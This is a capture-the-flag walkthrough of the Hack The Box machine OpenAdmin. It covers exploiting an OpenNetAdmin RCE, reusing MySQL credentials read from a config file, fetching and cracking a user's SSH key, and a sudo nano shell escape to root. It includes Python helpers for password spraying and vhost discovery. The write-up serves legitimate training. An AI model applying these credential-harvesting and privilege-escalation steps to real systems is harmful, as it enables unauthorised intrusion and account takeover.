OPENADMIN-HTB-WALKTHROUGH



Greetings to all. This is a walkthrough of OpenAdmin, an easy-rated Linux box on Hack The Box.

1. PORT SCAN

The port scan shows two open ports:
  1. 22 for SSH.
  2. 80 for HTTP.
(screenshot: port scan results)

2. WEB ENUMERATION


Port 80 serves the Apache default page. The page itself offers nothing interesting, so I ran DirBuster for directory enumeration and found a few directories:
/ona, /music
/ona shows a guest login portal for OpenNetAdmin (ONA) that displays the version number. A quick search for that version and service name turned up an RCE vulnerability with a public exploit on Exploit-DB:
https://www.exploit-db.com/exploits/47691

(screenshot: /ona login portal with version details)

The exploit gave me a low-privilege shell as the web server user, www-data.

(screenshot: www-data shell)


3. Taking USER1.


First, I listed the accounts on the box with 'cat /etc/passwd' and found the following interesting users:
  1. root
  2. joanna
  3. jimmy
The shell landed me in /opt/ona/www. To pivot to another user I kept enumerating, and after a while I found a database_settings.inc.php file under:
/opt/ona/www/local/config/database_settings.inc.php


(screenshot: database_settings.inc.php)


This file holds the MySQL credentials for the 'ona_sys' database user. Passwords are frequently reused, so I tried the same password against the users found above, and it worked for jimmy. I then logged in as jimmy over SSH.

(screenshot: SSH login as jimmy)
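The credential-reuse step above, as an added example that is not code from the box or from OpenNetAdmin: it pulls the database login and password out of a PHP config file and builds the list of local accounts with a real login shell to try that password against. The config layout is modelled on ONA's database_settings.inc.php, but the values are placeholders (the walkthrough does not reproduce the real password), and the /etc/passwd excerpt is constructed.

```python
"""Harvest DB credentials from a PHP config and pick the local accounts worth
trying them against.

Added example for this walkthrough, not code from the box or from OpenNetAdmin.
The config layout is modelled on ONA's database_settings.inc.php but the values
are placeholders; the /etc/passwd excerpt is constructed."""
import re

SAMPLE_CONFIG = r"""<?php
$ona_contexts=array (
  'DEFAULT' =>
  array (
    'databases' =>
    array (
      0 =>
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'ExamplePassw0rd!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
  ),
);
"""

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:joanna:/home/joanna:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
"""

# 'key' => 'value' pairs inside a PHP array; the value may contain escaped quotes.
PHP_PAIR = re.compile(r"'(\w+)'\s*=>\s*'((?:[^'\\]|\\.)*)'")
CRED_KEYS = ("db_host", "db_login", "db_passwd", "db_database")
NO_LOGIN_SHELLS = ("nologin", "false", "sync", "shutdown", "halt")


def php_credentials(text):
    """Return {key: value} for the credential-looking string entries of a PHP array."""
    creds = {}
    for key, value in PHP_PAIR.findall(text):
        if key in CRED_KEYS:
            creds[key] = value.replace("\\'", "'")  # undo PHP single-quote escaping
    return creds


def login_users(passwd_text):
    """Accounts from /etc/passwd whose shell allows an interactive login."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip blank or malformed lines
        name, shell = fields[0], fields[6]
        if shell.rsplit("/", 1)[-1] in NO_LOGIN_SHELLS:
            continue
        users.append(name)
    return users


def spray_plan(config_text, passwd_text):
    """(user, password) pairs to try: the DB password against every login-capable user."""
    creds = php_credentials(config_text)
    if "db_passwd" not in creds:
        return []
    return [(user, creds["db_passwd"]) for user in login_users(passwd_text)]


if __name__ == "__main__":
    print(php_credentials(SAMPLE_CONFIG))
    for user, password in spray_plan(SAMPLE_CONFIG, SAMPLE_PASSWD):
        # From the attacking machine this would be: sshpass -p "$password" ssh "$user@<target>" id
        print("try %s:%s" % (user, password))
```

A practical note on actually trying the pairs: `su` refuses to read a password from a non-interactive shell such as the one the web exploit gives, so either upgrade to a pty first (`python3 -c 'import pty; pty.spawn("/bin/bash")'`) or test the credentials over SSH from the attacking machine, which is also what confirms the password works for jimmy here.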

 

4. Taking USER2.

 

Note: jimmy belongs to a group named 'internal' (you can check with: groups jimmy). On further enumeration I found a web directory with the same name, 'internal', under /var/www/.

(screenshot: main.php)

This directory contains PHP files, and the interesting one is 'main.php', which is the key to taking over joanna: when it runs, it outputs joanna's private SSH key. Since 'internal' is a separate web root, there should be a virtual host config for it in /etc/apache2/sites-enabled/, and that config tells us the address and port the site listens on.

(screenshot: virtual host config)


With that address and port, a curl request from the box to the internal virtual host returned joanna's private key.
 
(screenshot: id_rsa of joanna)
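The virtual-host lookup described above, as an added example that is not code from the box: it parses the contents of /etc/apache2/sites-enabled/, finds the <VirtualHost> block whose DocumentRoot is the directory found on disk, and builds the URL and curl command to reach it from a shell on the box. The config is constructed; the host names, the loopback port 8080 and the web roots are placeholders, not values read from the target.

```python
"""Find which Apache virtual host serves a given web root and build the local
URL to fetch it from the box.

Added example for this walkthrough, not code from the box. The config below is
constructed: the host names, the loopback port 8080 and the web roots are
placeholders, not values read from the target."""
import re

SAMPLE_SITES = """
<VirtualHost *:80>
    ServerName openadmin.htb
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
</VirtualHost>

Listen 127.0.0.1:8080
<VirtualHost 127.0.0.1:8080>
    ServerName internal.openadmin.htb
    DocumentRoot /var/www/internal
    <Directory /var/www/internal>
        Require all granted
    </Directory>
</VirtualHost>
"""

VHOST = re.compile(r"<VirtualHost\s+([^>]+)>(.*?)</VirtualHost>", re.I | re.S)
LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


def _directive(body, name):
    """First value of a one-argument directive inside a vhost body, or None."""
    m = re.search(r"^\s*%s\s+(\S+)" % name, body, re.M | re.I)
    return m.group(1) if m else None


def parse_vhosts(text):
    """One dict per <VirtualHost> block: bind address, port, ServerName, DocumentRoot."""
    hosts = []
    for addrs, body in VHOST.findall(text):
        first = addrs.split()[0]               # a vhost may list several addr:port pairs
        host, _, port = first.rpartition(":")  # handles "*:80", "127.0.0.1:8080", "[::1]:8080"
        hosts.append({
            "host": host or "*",
            "port": int(port) if port.isdigit() else 80,
            "server_name": _directive(body, "ServerName"),
            "document_root": _directive(body, "DocumentRoot"),
            # bound to loopback only: invisible to an external port scan
            "loopback_only": host in LOOPBACK,
        })
    return hosts


def serving(document_root, hosts):
    """The vhost whose DocumentRoot is the directory you found on disk, or None."""
    return next((h for h in hosts if h["document_root"] == document_root), None)


def local_url(vhost, path):
    """URL to reach the vhost from a shell on the box itself."""
    host = "127.0.0.1" if vhost["host"] in LOOPBACK | {"*"} else vhost["host"]
    return "http://%s:%d/%s" % (host, vhost["port"], path.lstrip("/"))


def curl_command(vhost, path):
    """curl invocation that also sends the ServerName as Host, for name-based vhosts."""
    cmd = "curl -s"
    if vhost["server_name"]:
        cmd += " -H 'Host: %s'" % vhost["server_name"]
    return cmd + " " + local_url(vhost, path)


if __name__ == "__main__":
    # Real use: read the files with "cat /etc/apache2/sites-enabled/*" and feed the text in.
    internal = serving("/var/www/internal", parse_vhosts(SAMPLE_SITES))
    print(internal)
    print(curl_command(internal, "main.php"))
```

A loopback-only virtual host never shows up in the external nmap scan, which is why it was not among the two open ports found at the start; `ss -tlnp` on the box confirms the listener, and the page has to be fetched from the box itself (or through an SSH port forward) rather than from the attacking machine.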


The key is passphrase-protected. Converting it to a john hash with ssh2john (shipped with John the Ripper; on Kali it is /usr/share/john/ssh2john.py) and cracking that hash with rockyou gives the passphrase, which lets us log in as joanna with the key (set its permissions to 600 first, or ssh will refuse to use it):
     1. python ssh2john.py id_rsa > hash
     2. john hash --wordlist=/usr/share/wordlists/rockyou.txt


(screenshot: cracking the passphrase)


5. ROOT

 

Through ‘sudo -l’, we can see that joanna can run /bin/nano /opt/priv as root without entering a password (a NOPASSWD rule). GTFOBins lists a nano breakout for exactly this case: open the file with sudo, press Ctrl-R followed by Ctrl-X to reach nano's "Command to execute" prompt, and run `reset; sh 1>&0 2>&0`, which spawns an interactive root shell. Note that the sudo rule only fixes nano's file argument, not what nano can do: its read-file (Ctrl-R) and write-out (Ctrl-O) commands also read or overwrite any root-owned file, so the same rule could be abused even without spawning a shell.
  • sudo /bin/nano /opt/priv
    (screenshot: GTFOBins nano entry)

    (screenshot: root shell)


